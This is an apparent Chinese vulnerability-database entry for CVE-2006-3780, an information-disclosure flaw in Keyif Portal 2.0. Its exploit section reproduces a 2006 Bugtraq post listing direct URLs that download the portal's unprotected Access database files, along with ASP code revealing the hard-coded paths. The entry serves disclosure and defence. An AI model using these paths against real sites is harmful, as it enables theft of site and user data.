Keyifweb Keyif Portal web根目录安全信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194032 漏洞类型 未知
发布时间 2006-07-24 更新时间 2006-07-24
CVE编号 CVE-2006-3780 CNNVD-ID CNNVD-200607-388
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/82443
https://cxsecurity.com/issue/WLB-2006070115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-388
|漏洞详情
KeyifwebKeyifPortal2.0将敏感信息储存在没有充分访问控制的web根目录下,远程攻击者可以借助database/A9S7G6ASD790目录中的(1)ANKET/anket.mdb,(2)HABER/keyifweb.mdb,(3)ASP/download.mdb,或(4)SAYAC/aktif.mdb的直接请求,下载数据库。
|漏洞EXP
title : Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download

-

script site : http://www.keyifweb.com/

-

Discovered : xoron

-

Cont@ct    : x0r0n (at) hotmail (dot) com [email concealed]

-

Exploit    : http://www.target.com/[path]/A9S7G6ASD790/ANKET/anket.mdb

http://www.target.com/[path]/A9S7G6ASD790/HABER/keyifweb.mdb

http://www.target.com/[path]/A9S7G6ASD790/ASP/download.mdb

http://www.target.com/[path]/A9S7G6ASD790/SAYAC/aktif.mdb

-

Code:

SAYAC

Veri_yolu = Server.MapPath("database/A9S7G6ASD790/SAYAC/aktif.mdb")

Bcumle = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" & Veri_yolu

-----

ASP

Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")

-----

ANKET

vt_yol = server.mappath("database/A9S7G6ASD790/ANKET/anket.mdb")

Set bag = CreateObject("ADODB.Connection")

-----

DOWNLOAD

Set Sur = Server.CreateObject("ADODB.Connection")

Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")

-

XORON - Cyber-Warrior.Org /// special thanx R3D4C!D :)
|受影响的产品
Keyifweb Keyif Portal 2.0
|参考资料

来源:BUGTRAQ
名称:20060716KeyifPortalv2.0-MicrosoftAccessDriver(MDB)Download
链接:http://www.securityfocus.com/archive/1/archive/1/440415/100/0/threaded
来源:SREASON
名称:1278
链接:http://securityreason.com/securityalert/1278